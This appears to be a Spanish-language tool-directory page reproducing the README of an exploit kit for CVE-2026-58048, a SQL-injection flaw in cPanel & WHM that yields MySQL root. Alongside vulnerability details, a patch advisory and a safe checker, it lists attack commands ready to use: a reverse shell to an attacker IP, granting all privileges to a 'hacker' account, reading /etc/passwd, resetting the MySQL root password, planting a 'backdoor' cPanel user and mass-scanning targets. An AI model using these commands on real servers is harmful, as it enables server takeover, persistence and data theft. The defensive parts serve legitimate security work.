Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-58048-PoC-Exploit — 👾 CVE-2026-58048 – Kit de herramientas de ejecución SQL root en cPanel (CVSS 9.4) | Suite completa de herramientas Red/Blue Team para cPanel & WHM 11.x sin parchear. 2 herramientas: Safe Checker (auditoría/reportes), Weaponized (reverse shell, persistencia, UDF RCE, despliegue, lectura/escritura de archivos, operaciones de base de datos, escaneo masivo). Con Python. 🦾 Úsalo éticamente, mantente legal <3 | Kitploit
Herramientas/GitHubGitHub/tc4dy/cve-2026-58048-poc-exploit
ReconocimientoEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónPruebas de PenetraciónRed TeamingRespuesta a Incidentes

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Seguridad de Bases de Datos
GitHubtc4dy/cve-2026-58048-poc-exploit

CVE-2026-58048-PoC-Exploit

Ver Repositorio
525hace 1 mesAún no revisado

Acerca de

👾 CVE-2026-58048 – Kit de herramientas de ejecución SQL root en cPanel (CVSS 9.4) | Suite completa de herramientas Red/Blue Team para cPanel & WHM 11.x sin parchear. 2 herramientas: Safe Checker (auditoría/reportes), Weaponized (reverse shell, persistencia, UDF RCE, despliegue, lectura/escritura de archivos, operaciones de base de datos, escaneo masivo). Con Python. 🦾 Úsalo éticamente, mantente legal <3

Compartir

CVEPoC

💥 CVE‑2026‑58048 – Kit de ejecución SQL como root en cPanel

Python 3.8+ CVSS Author cPanel

⚠️ SOLO USO ÉTICO – PRUEBAS DE SEGURIDAD AUTORIZADAS
Este repositorio proporciona herramientas únicamente para profesionales de seguridad autorizados, equipos azules y testers de penetración.
El acceso no autorizado a sistemas informáticos es ilegal según la CFAA (EE. UU.), la Computer Misuse Act (Reino Unido), el TCK 243/244 (Turquía) y leyes similares en todo el mundo.


📖 Descripción general de la vulnerabilidad

CVE‑2026‑58048 es una vulnerabilidad crítica de inyección SQL en cPanel & WHM versiones 11.x que permite a un usuario autenticado de cPanel ejecutar comandos SQL arbitrarios con privilegios de root de MySQL a través de la funcionalidad de renombrado de bases de datos.

Cómo funciona

  1. Se requiere acceso autenticado – el atacante debe tener una cuenta de cPanel válida (usuario/contraseña) en el servidor objetivo.
  2. Manipulación del modo SQL – el exploit establece la sesión de MySQL en modo ANSI_QUOTES, lo que cambia el comportamiento del análisis sintáctico.
  3. Inyección en el renombrado de bases de datos – al renombrar una base de datos, el nuevo nombre no se sanitiza correctamente, lo que permite al atacante inyectar sentencias SQL arbitrarias.
  4. Privilegios de root – dado que la operación de renombrado se ejecuta con privilegios de root de MySQL, el SQL inyectado se ejecuta con los máximos permisos de base de datos.
  5. Impacto – toma de control total de la base de datos, escalada de privilegios, compromiso del servidor, robo de datos, puertas traseras y movimiento lateral. ¡Actualice inmediatamente!

Versiones afectadas

  • cPanel & WHM 11.110 y anteriores – vulnerables
  • 11.111 – 11.118 – vulnerables
  • 11.119 – 11.126 – vulnerables
  • 11.127 – 11.134 – vulnerables
  • 11.135 – 11.136 – vulnerables
  • 11.137.x – vulnerables por debajo de 11.137.1.6
  • 11.138.1.6 y posteriores – parcheadas

Parche

  • Actualice a cPanel & WHM 11.138.1.6 o superior.
  • Si la actualización no es posible, deshabilite las operaciones de renombrado de MySQL para los usuarios de cPanel como solución temporal.

🧰 Herramientas

HerramientaPropósitoUsuario previsto
exploit.pyKit completo weaponizado con reverse shell, persistencia, RCE mediante UDF, lectura/escritura de archivos, operaciones de base de datos, soporte de proxy y escaneo masivo.Equipos rojos / pentesters autorizados
safecheck.pyComprobador de vulnerabilidad no intrusivo que detecta la versión de cPanel y evalúa el riesgo sin ejecutar ninguna carga maliciosa. Genera informes detallados.Equipos azules / auditores de seguridad

📊 Comparación de características

Característicaexploit.pysafecheck.py
Detección de vulnerabilidad✅✅
Detección de versión✅✅
Inyección SQL como root de MySQL✅❌
Reverse shell✅❌
Persistencia (creación de usuario de cPanel)✅❌
RCE mediante UDF (ejecución de comandos)✅❌
Lectura/escritura de archivos✅❌
Operaciones de base de datos (cualquier SQL)✅❌
Soporte de proxy✅✅
Escaneo masivo (multihilo)✅❌
Shell interactiva✅❌
Modo no intrusivo (seguro)❌✅
Modo detallado/Depuración✅✅
Control de verificación SSL✅✅
User‑Agent personalizado✅✅
Retardo entre peticiones / reintentos✅❌
Salida JSON / informe✅✅
Comprobación de accesibilidad del endpoint❌✅
Detección de fuga del modo SQL❌✅

🎯 Resumen de casos de uso

EscenarioHerramienta recomendada
Equipo Azul – verificar si su instalación de cPanel es vulnerablesafecheck.py
Auditoría de seguridad – evaluación de vulnerabilidad no intrusivasafecheck.py
Equipo Rojo – pruebas de penetración autorizadas con explotación completaexploit.py
Bug Bounty – pruebas de divulgación responsablesafecheck.py
Escaneo masivo – comprobar múltiples objetivos en busca de vulnerabilidadexploit.py (solo detección)
Respuesta a incidentes – comprobar si los sistemas están comprometidossafecheck.py

⚙️ Instalación

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
colorama
pymysql

📋 Parámetros

Parámetros de exploit.py

ParámetroDescripción
-t, --targetURL de cPanel objetivo (p. ej. https://cpanel.example.com:2083)
-l, --target-fileArchivo que contiene la lista de objetivos (uno por línea) para escaneo masivo
-u, --mysql-userNombre de usuario de cPanel/MySQL
-P, --mysql-passContraseña de cPanel/MySQL
--mysql-portPuerto de MySQL (por defecto: 3306)
-p, --portSobrescribir el puerto de cPanel (por defecto desde la URL o 2083)
--threadsNúmero de hilos para múltiples objetivos (por defecto: 10)
-o, --outputGuardar resultados en archivo (objetivo único)
--logArchivo de registro para salida detallada
-v, --verboseSalida detallada
--proxyProxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080)
-ua, --user-agentUser‑Agent personalizado
--no-keep-aliveNo mantener la sesión activa
--delayRetardo entre peticiones (por defecto: 2.0s)
--max-retriesReintentos máximos (por defecto: 3)
--ssl-verifyVerificar certificados SSL
--cmdComando a ejecutar (prefijo sql: o udf: para especificar)
--injectSQL personalizado a inyectar (anula otras acciones)
--reverse-shellIP:PUERTO del reverse shell (usa UDF)
--passwdCambiar la contraseña de root de MySQL
--adduserCrear usuario de cPanel (USUARIO DOMINIO CONTRASEÑA)

Parámetros de safecheck.py

ParámetroDescripción
-t, --targetURL de cPanel objetivo (p. ej. https://cpanel.example.com:2083)
-v, --verboseSalida detallada
--proxyProxy HTTP/HTTPS (p. ej. http://127.0.0.1:8080)
-ua, --user-agentUser‑Agent personalizado
--ssl-verifyVerificar certificados SSL
--timeoutTiempo de espera de la petición en segundos (por defecto: 10)
--logGuardar informe en archivo
--jsonMostrar resultados en formato JSON

💥 Escenarios

#EscenarioComando
1Comprobación rápida de vulnerabilidadpython safecheck.py -t https://cpanel.example.com:2083
2Escaneo detallado con informepython safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v
3Reverse shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Ejecutar SQL personalizado (root)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'"
5Leer archivo sensiblepython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Cambiar la contraseña de root de MySQLpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Crear nuevo usuario de cPanel (persistencia)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Shell interactiva tras la explotaciónpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Escaneo masivo desde archivopython exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json
10Usar proxy y User‑Agent personalizadopython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)"

🧪 Uso de endpoints y API

El exploit utiliza los siguientes endpoints de la UAPI de cPanel:

EndpointPropósito
/execute/Mysql/create_databaseCrear base de datos temporal
/execute/Mysql/delete_databaseLimpiar las bases de datos creadas
/execute/Mysql/rename_databaseEndpoint vulnerable – desencadena la inyección SQL
/execute/Version/get_versionAutenticación y comprobación de versión
/execute/UserManager/create_userCrear nuevo usuario de cPanel (persistencia)
/execute/UserManager/list_usersListar usuarios existentes

🛡️ Uso responsable

  • Utilice estas herramientas únicamente en sistemas de su propiedad o para los que tenga permiso explícito por escrito para realizar pruebas.
  • El acceso no autorizado es ilegal y poco ético.
  • Los autores no se hacen responsables de ningún uso indebido.
  • Cumpla siempre con las leyes y normativas de su país.

Este software se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.

Descargar herramienta
--readLeer un archivo mediante LOAD_FILE
-i, --interactiveShell interactiva tras el exploit
--verifyVerificar el éxito del exploit intentando iniciar sesión en MySQL
--pingHacer ping al objetivo antes de la explotación